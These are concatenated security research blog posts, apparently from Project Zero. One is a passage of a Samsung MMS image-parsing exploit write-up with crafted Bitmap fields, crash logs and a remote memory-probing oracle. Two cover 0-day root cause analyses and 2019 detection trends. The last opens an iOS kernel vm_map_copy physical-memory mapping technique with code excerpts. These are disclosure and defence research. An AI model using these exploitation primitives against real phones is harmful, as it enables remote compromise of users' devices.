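  auto put_u32 = [&blob](size_t off, uint32_t v) { std::memcpy(&blob[off], &v, 4); };

  put_u32(0x0c, 1);            // fWidth
  put_u32(0x10, 1);            // fHeight
  put_u64(0x18, probe_start);  // fPixels: start of the probed address range
  put_u64(0x20, 0x1000);       // fRowBytes: advance one page per row
  put_u64(0x58, 0);            // mInfo.fColorSpace: NULL to avoid the dereference
  put_u32(0x60, 1);            // mInfo.fWidth
  put_u32(0x64, pages);        // mInfo.fHeight: number of pages to probe
  put_u32(0x68, 6);            // mInfo.fColorType: BGRA_8888
  return blob;
}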

As always, we should confirm the behavior on a real device. We can start off with setting fPixels to an invalid address such as 0xccc...ccc, and sending the sample via MMS:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 1101 (pool-8-thread-1), pid 848 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 00000000006fb210  /system/lib64/libhwui.so (neon::RGBA_to_BGRA(unsigned int*, unsigned int const*, int)+96)
      #01 pc 00000000003b5410  /system/lib64/libhwui.so (_ZL17swizzle_or_premulRK11SkImageInfoPvmS1_PKvmRK22SkColorSpaceXformSteps.llvm.9990621564539140211+208)
      #02 pc 00000000003b5114  /system/lib64/libhwui.so (SkConvertPixels(SkImageInfo const&, void*, unsigned long, SkImageInfo const&, void const*, unsigned long)+156)
      #03 pc 00000000004f26c0  /system/lib64/libhwui.so (SkPixmap::readPixels(SkImageInfo const&, void*, unsigned long, int, int) const+312)
      #04 pc 0000000000185fb8  /system/lib64/libandroid_runtime.so (bitmapCopyTo(SkBitmap*, SkColorType, SkBitmap const&, SkBitmap::Allocator*)+384)
      #05 pc 000000000018397c  /system/lib64/libandroid_runtime.so (Bitmap_copy(_JNIEnv*, _jobject*, long, int, unsigned char)+284)
[...]

A sigsegv is indeed generated upon a read from the bad address in the color conversion function. Let's try something more complex. On my test device, the last mapping in the address space of the com.samsung.android.messaging process is a stack:

7fdf319000-7fdfb18000 rw-p 00000000 00:00 0                              [stack]

To verify that our oracle primitive touches each page in the given area, we can set fPixels to 0x7fdfb10000 (eight pages before the end of the stack), and mInfo.fHeight to 10. As a result, we should see the following crash:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7fdfb18000 in tid 1630 (pool-8-thread-1), pid 1500 (droid.messaging)

The fault address lies directly after the stack mapping, which indicates that the loop successfully executed eight iterations, and failed during the ninth, when it went out of bounds. This completes our quest for a suitable ASLR oracle primitive, as it ultimately shows that we can now remotely trigger memory reads of a highly-controllable set of addresses in the context of the attacked Messages app.

Summary

To recap, we have analyzed the available memory corruption bugs based on pseudo-ASAN crash reports, and decided to work with a linear heap overflow present in RLE decompression. The overflown buffer is a pixel storage allocation associated with an android::Bitmap object, and thanks to some useful jemalloc properties (determinism, size bins, lack of inline metadata), we found a way to reliably corrupt the relevant Bitmap object itself.

The Bitmap class is non-trivial, and it provides a variety of useful primitives when corrupted. In order to hijack the control flow, we can provoke a call from an arbitrary vtable pointer, or cause a direct call to a controlled function pointer with two arguments, if we know the address of libhwui.so. Furthermore, in the context of a potential ASLR bypass, we can prompt accesses from a controlled memory range, which may trigger a crash or not depending on the readability of the region. This is as good as we're going to get with regards to low-level exploitation capabilities.

With solid foundations laid down for the attack, we can shift our attention to some important higher level issues, such as:

  • How to programmatically send MMS messages?
  • How to (ab)use the MMS protocol to leak information on whether the Messages app crashed upon the receipt of a message?
  • Even with the presence of a potential side channel, how to disclose the full addresses of data and/or code in an effective and timely manner?
  • Finally, how to convert the currently known RCE primitives to achieve actual arbitrary code execution?

Finding the answers to these questions will be the subject of the upcoming blog posts in the series.

Root Cause Analyses for 0-day In-the-Wild Exploits

29 July 2020 at 17:27
By: Tim

Posted by Maddie Stone, Project Zero


When a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. 

Our effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we’re publishing some in bulk now to play “catch-up”, in the future we plan to post each one in a timely manner after it’s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. 

We’ve added a new column to the “0day In the Wild” tracking spreadsheet that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.


For each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we’d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our template and publish this information about 0-days they detect and/or analyze! 

When completing a root cause analysis we focus on the following areas.
  • Bug class
  • Details of the vulnerability, such as how to trigger, what it allows, etc.
  • Exploit method and whether or not it’s a known method
  • Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)
  • Any historical, present, and future bug context such as previous related bugs
  • Areas for variant analysis and any found variants
  • Structural improvements
    • Can you also kill the entire bug class?
    • Is there a way to make it much harder to exploit?
  • Potential detection methods for similar 0-days
    • Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from “indicators of compromise” because we’re focusing on detecting while it’s still a 0-day.

We selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.

Out of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we’re publishing here today. These are 5 of the 6 0-days detected in August 2019 or later (when I joined the team and started this initiative 🙂). In addition, we’re publishing RCAs for the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with Google's Threat Analysis Group, and for a Firefox 0-day that Project Zero had reported to Firefox and that was also discovered independently in-the-wild.


These RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. 

Our hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time-consuming, and more difficult for attackers to use 0-days in the wild. Please reach out with any feedback and/or suggestions and we hope that others will also begin publishing information from the RCA template in the future.

Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019

29 July 2020 at 17:27
By: Tim
Posted by Maddie Stone, Project Zero

In May 2019, Project Zero released our tracking spreadsheet for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another blog post today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing 8 root cause analyses that we have done for in-the-wild 0-days from 2019. 

When I had the idea for this “Year in Review” blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there’d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or… but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected. 

The rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.

The Basics

In 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping here.  This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. 

Line graph of 0-days detected in the wild by year: 2014 - 22, 2015 - 28, 2016 - 25, 2017 - 22, 2018 - 12, 2019 - 20.


The largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don’t know the true detection rate of all 0-day exploits, it’s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we’d clearly know that to be false.

All of the 0-day exploits detected in 2019 are detailed in the Project Zero tracking spreadsheet here

0-days by Vendor

One of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. 

While Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it’s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft’s ecosystem also allows for 3rd parties, in addition to Microsoft themself, to deploy detection solutions for 0-days. With more people looking for 0-days using varied detection methodologies, more 0-days are likely to be found.

Bar graph of the number of detected 0-days by vendor: Apple, Facebook, Google, Microsoft, Mozilla, and Trend Micro.


Microsoft Deep-Dive

For 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it’s worthwhile to dive into the Microsoft bugs to see what we can learn since it’s the only platform we have a decent sample size for. 

Of the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows. All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it’s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software.

Out of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.

Even just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant targets for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?

CVE             | Affected Windows versions                       | Exploitation of Latest SW Release? | Component
CVE-2019-0676   | 7 SP1, 8.1, 10, 1607, 1703, 1803, 1809          | Yes (1809)                         | IE
CVE-2019-0808   | 7 SP1                                           | N/A (1809)                         | win32k
CVE-2019-0797   | 8.1, 10, 1607, 1703, 1803, 1809                 | Exploitation Unlikely (1809)       | win32k
CVE-2019-0703   | 7 SP1, 8.1, 10, 1607, 1703, 1803, 1809          | Yes (1809)                         | Windows SMB
CVE-2019-0803   | 7 SP1, 8.1, 10, 1607, 1703, 1803, 1809          | Exp More Likely (1809)             | win32k
CVE-2019-0859   | 7 SP1, 8.1, 10, 1607, 1703, 1803, 1809          | Exp More Likely (1809)             | win32k
CVE-2019-0880   | 7 SP1, 8.1, 10, 1607, 1703, 1803, 1809, 1903    | Exp More Likely (1903)             | splwow64
CVE-2019-1132   | 7 SP1                                           | N/A (1903)                         | win32k
CVE-2019-1367   | 7 SP1, 8.1, 10, 1607, 1703, 1803, 1809, 1903    | Yes (1903)                         | IE
CVE-2019-1429   | 7 SP1, 10, 1607, 1703, 1803, 1809, 1903         | Yes (1903)                         | IE
CVE-2019-1458   | 7 SP1, 8.1, 10, 1607                            | N/A (1909)                         | win32k

Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429

While this blog post’s goal is not to detail each 0-day used in 2019, it’d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor according to Google’s Threat Analysis Group (TAG)

Our root cause analysis provides more details on these bugs, but we’ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was “fixed” as CVE-2019-1367, but it turns out the patch didn’t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric (P0 1947). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft’s patch was again incomplete. This issue was patched as CVE-2020-0674. 

A more thorough discussion on variant analysis and complete patches is due, but at this time we’ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can’t give attackers four chances at the same bug. 

Memory Corruption

63% of 2019’s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-frees being a common target is nothing new. “Smashing the Stack for Fun and Profit”, the seminal work describing stack-based memory corruption, was published back in 1996. But it’s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there’s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don’t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs, and the fact that they tend to be less reliable than logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don’t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today, and so I think we may just be better at detecting these exploits. Logic and design bugs on the other hand rarely look the same, because in their nature they’re taking advantage of a specific flaw in the design of that specific component, thus making them more difficult to detect than standard memory corruption vulns.

Even if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.

More Thoughts on Detection

As we’ve discussed up to this point, the same questions posed in the team's original blog post still hold true: “What is the detection rate of 0-day exploits?” and “How many 0-day exploits are used without being detected?”. 

We, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Both Microsoft and third-party security companies build tools and techniques for detecting 0-days. We don’t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there’s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows, and a key factor there is what level of access a vendor provides for detection.

Who is doing the detecting? 

Another interesting side of detection is that a single security researcher, Clément Lecigne of Google's TAG, is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we would have detected a third fewer of the 0-days actually used in the wild if it wasn’t for Clément and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that’s a worrying sign for how we’re using our resources. The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-day exploits that are used in the wild.

Out of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I’d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, “tips” about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it’s so difficult for external researchers to get into those platforms and detect exploitation.

“Clandestine” 0-day reporting

Anecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.

0-day Detection on Mobile Platforms

As mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to Zerodium. We know that these exploits are being developed and used, we’re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the “walled garden” of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it’s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?

Another interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn’t mean none were used. Instead it means we aren’t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.

Detection on Other Platforms

It’s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro’s OfficeScan is worth targeting, then so are the other much more prevalent products. If that’s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this blogpost details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can’t make confident determinations of how much 0-day exploitation is occurring per platform.

Conclusion

Here’s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily “technical”, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. 

Along with publishing this Year in Review today, we’re also publishing the root cause analyses that we completed, which were used to draw our conclusions. Please check out the blog post if you’re interested in more details about the different 0-days exploited in the wild in 2019. 

One Byte to rule them all

30 July 2020 at 16:17
By: Tim
Posted by Brandon Azad, Project Zero

One Byte to rule them all, One Byte to type them,
One Byte to map them all, and in userspace bind them
-- Comment above vm_map_copy_t

For the last several years, nearly all iOS kernel exploits have followed the same high-level flow: memory corruption and fake Mach ports are used to gain access to the kernel task port, which provides an ideal kernel read/write primitive to userspace. Recent iOS kernel exploit mitigations like PAC and zone_require seem geared towards breaking the canonical techniques seen over and over again to achieve this exploit flow. But the fact that so many iOS kernel exploits look identical from a high level begs questions: Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

In this blog post, I'll describe a new iOS kernel exploitation technique that turns a one-byte controlled heap overflow directly into a read/write primitive for arbitrary physical addresses, all while completely sidestepping current mitigations such as KASLR, PAC, and zone_require. By reading a special hardware register, it's possible to locate the kernel in physical memory and build a kernel read/write primitive without a fake kernel task port. I'll conclude by discussing how effective various iOS mitigations were or could be at blocking this technique and by musing on the state-of-the-art of iOS kernel exploitation. You can find the proof-of-concept code here.

I - The Fellowship of the Wiring

A struct of power

While looking through the XNU sources, I often keep an eye out for interesting objects to manipulate or corrupt for future exploits. Soon after discovering CVE-2020-3837 (the oob_timestamp vulnerability), I stumbled across the definition of vm_map_copy_t:

struct vm_map_copy {
        int                     type;
#define VM_MAP_COPY_ENTRY_LIST          1
#define VM_MAP_COPY_OBJECT              2
#define VM_MAP_COPY_KERNEL_BUFFER       3
        vm_object_offset_t      offset;
        vm_map_size_t           size;
        union {
                struct vm_map_header    hdr;      /* ENTRY_LIST */
                vm_object_t             object;   /* OBJECT */
                uint8_t                 kdata[0]; /* KERNEL_BUFFER */
        } c_u;
};

This looked interesting to me for several reasons:

  1. The structure has a type field at the very start, so an out-of-bounds write could change it from one type to another, leading to type confusion. Because iOS is little-endian, the least significant byte comes first in memory, meaning that even a single-byte overflow would be sufficient to set the type to any of the three values.
  2. The type discriminates a union between arbitrary controlled data (kdata) and kernel pointers (hdr and object). Thus, corrupting the type could let us directly fake pointers to kernel objects without needing to perform any reallocations.
  3. I remembered reading about vm_map_copy_t being used as an interesting primitive in past exploits (before iOS 10), though I couldn't remember where or how it was used. vm_map_copy objects were also used by Ian Beer in Splitting atoms in XNU.

So, vm_map_copy looks like a possibly interesting target for corruption; however, it's only truly interesting if the code uses it in a truly interesting way.

Digging through osfmk/vm/vm_map.c, I found that vm_map_copyout_internal() does indeed use the copy object in a very interesting way. But first, let's talk a little more about what vm_map_copy is and how it works.

A vm_map_copy represents a copy-on-write slice of a process's virtual address space which has been packaged up, ready to be inserted into another virtual address space. There are three possible internal representations: as a list of vm_map_entry objects, as a vm_object, or as an inline array of bytes to be directly copied into the destination. We'll focus on types 1 and 3.

Fundamentally, the ENTRY_LIST type is the most powerful and general representation, while the KERNEL_BUFFER type is strictly an optimization. A vm_map_entry list consists of several allocations and several layers of indirection: each vm_map_entry describes a virtual address range [vme_start, vme_end) that is being mapped by a specific vm_object, which in turn contains a list of vm_pages describing the physical pages backing the vm_object.

A diagram showing the heap arrangement of a vm_map_copy object of type ENTRY_LIST. The vm_map_entrys are stored in a circular doubly-linked list. Each entry holds a pointer to a vm_object describing the memory region for that entry. Each vm_object contains a singly-linked list of vm_pages describing the physical pages backing the memory object.


Meanwhile, if the data being inserted is not shared memory and if the size is roughly two pages or less, then the vm_map_copy is simply over-allocated to hold the data contents inline in the same allocation, no indirection or further allocations required.

A diagram showing the layout of a vm_map_copy of type KERNEL_BUFFER. Rather than having a linked list of vm_map_entrys, there is an inline array of data to be copied directly into the receiving address space.


As a consequence of this optimization, the 8 bytes of the vm_map_copy object at offset 0x20 can be either a pointer to the head of a vm_map_entry list, or fully attacker-controlled data, all depending on the type field at the start. So corrupting the first byte of a vm_map_copy object causes the kernel to interpret arbitrary controlled data as a vm_map_entry pointer.

Comparing vm_map_copy objects of type KERNEL_BUFFER and ENTRY_LIST, the "next" pointer of the ENTRY_LIST-type copy falls into the inline data of the KERNEL_BUFFER-type copy.
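
To make the overlap concrete, here is a minimal userspace sketch (not kernel code) built on a simplified replica of the struct definition above. The replica's field names and the size of its kdata array are placeholders, but the offsets match the layout described in the text.

#include <stdio.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct fake_vm_map_links  { void *prev, *next; uint64_t start, end; };
struct fake_vm_map_header { struct fake_vm_map_links links; };

struct fake_vm_map_copy {
    int      type;                              /* offset 0x00 */
    uint64_t offset;                            /* offset 0x08 */
    uint64_t size;                              /* offset 0x10 */
    union {
        struct fake_vm_map_header hdr;          /* ENTRY_LIST: links.next lands at 0x20 */
        uint8_t                   kdata[0x100]; /* KERNEL_BUFFER: inline data */
    } c_u;                                      /* offset 0x18 */
};

int main(void) {
    struct fake_vm_map_copy copy = { .type = 3 /* KERNEL_BUFFER */ };
    uint64_t fake_entry = 0x4141414141414141;    /* attacker-controlled inline data */
    memcpy(&copy.c_u.kdata[8], &fake_entry, 8);  /* lands at offset 0x20 */

    ((uint8_t *)&copy)[0] = 1;  /* the one-byte "overflow": type becomes ENTRY_LIST */

    printf("links.next is at offset 0x%zx\n",
           offsetof(struct fake_vm_map_copy, c_u.hdr.links.next));
    printf("now interpreted as an entry pointer: %p\n", copy.c_u.hdr.links.next);
    return 0;
}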


With this understanding of vm_map_copy internals, let's turn back to vm_map_copyout_internal(). This function is responsible for taking a vm_map_copy and inserting it into the destination address space (represented by type vm_map_t). It is reachable when sharing memory between processes by sending an out-of-line memory descriptor in a Mach message: the out-of-line memory is stored in the kernel as a vm_map_copy, and vm_map_copyout_internal() is the function that inserts it into the receiver's process.

As it turns out, things get rather exciting if vm_map_copyout_internal() processes a corrupted vm_map_copy containing a pointer to a fake vm_map_entry hierarchy. In particular, consider what happens if the fake vm_map_entry claims to be wired, which causes the function to try to fault in the page immediately:

kern_return_t
vm_map_copyout_internal(
    vm_map_t                dst_map,
    vm_map_address_t        *dst_addr,      /* OUT */
    vm_map_copy_t           copy,
    vm_map_size_t           copy_size,
    boolean_t               consume_on_success,
    vm_prot_t               cur_protection,
    vm_prot_t               max_protection,
    vm_inherit_t            inheritance)
{
...
    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }
...
    vm_map_lock(dst_map);
...
    adjustment = start - vm_copy_start;
...
    /*
     *    Adjust the addresses in the copy chain, and
     *    reset the region attributes.
     */
    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {
...
        entry->vme_start += adjustment;
        entry->vme_end += adjustment;
...
        /*
         * If the entry is now wired,
         * map the pages into the destination map.
         */
        if (entry->wired_count != 0) {
...
            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {
...
                m = vm_page_lookup(object, offset);
...
                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);
...
                offset += PAGE_SIZE_64;
                va += PAGE_SIZE;
           }
       }
   }
...
        vm_map_copy_insert(dst_map, last, copy);
...
    vm_map_unlock(dst_map);
...
}

Let's walk through this step-by-step. First, other vm_map_copy types are handled:

    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }

The vm_map is locked:

    vm_map_lock(dst_map);

We enter a for loop over the linked list of (fake) vm_map_entry objects:

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

We handle the case where the vm_map_entry is wired and should thus be faulted in immediately:

        if (entry->wired_count != 0) {

When set, we loop over every virtual address in the wired entry. Since we control the contents of the fake vm_map_entry, we can control the object pointer (of type vm_object) and offset value that are read:

            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {

We look up the vm_page struct for each physical page of memory that needs to be wired in. Since we control the fake vm_object and the offset, we can cause vm_page_lookup() to return a pointer to a fake vm_page struct whose contents we control:

                m = vm_page_lookup(object, offset);

And finally, we call vm_fault_enter() to fault in the page:

                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);

The call to vm_fault_enter() is rather complicated, so I won't put the code here. Suffice to say, by setting fields in our fake objects appropriately, it is possible to navigate vm_fault_enter() with a fake vm_page object in order to reach a call to pmap_enter_options() with a completely arbitrary physical page number:

kern_return_t
pmap_enter_options(
        pmap_t pmap,
        vm_map_address_t v,
        ppnum_t pn,
        vm_prot_t prot,
        vm_prot_t fault_type,
        unsigned int flags,
        boolean_t wired,
        unsigned int options,
        __unused void   *arg)

pmap_enter_options() is responsible for modifying the page tables of the destination to insert the translation table entry that will establish a mapping from a virtual address to a physical address. Analogously to how vm_map manages the state for the virtual mappings of an address space, the pmap struct manages the state for the physical mappings (i.e. page tables) of an address space. And according to the sources in osfmk/arm/pmap.c, no further validation is performed on the supplied physical page number before the translation table entry is added.

Thus, our corrupted vm_map_copy object actually gives us an incredibly powerful primitive: mapping arbitrary physical memory directly into our process in userspace!

If we start with a KERNEL_BUFFER vm_map_copy and corrupt the first byte to change the type to ENTRY_LIST, then we can control the value of the "next" field to make it point to a fake vm_map_entry hierarchy, including a fake vm_page. The physical address specified in the vm_page's "vmp_phys_page" field will be mapped by the call to vm_map_copyout_internal().

An old friend

I decided to build the POC for the vm_map_copy physical memory mapping technique on top of the kernel read/write primitive provided by the oob_timestamp exploit for iOS 13.3. There were two primary reasons for this.

First, I did not have a good bug available to develop a complete exploit with it. Even though I had initially stumbled upon the idea while trying to exploit the oob_timestamp bug, it quickly became apparent that that bug wasn't a good fit for this technique.

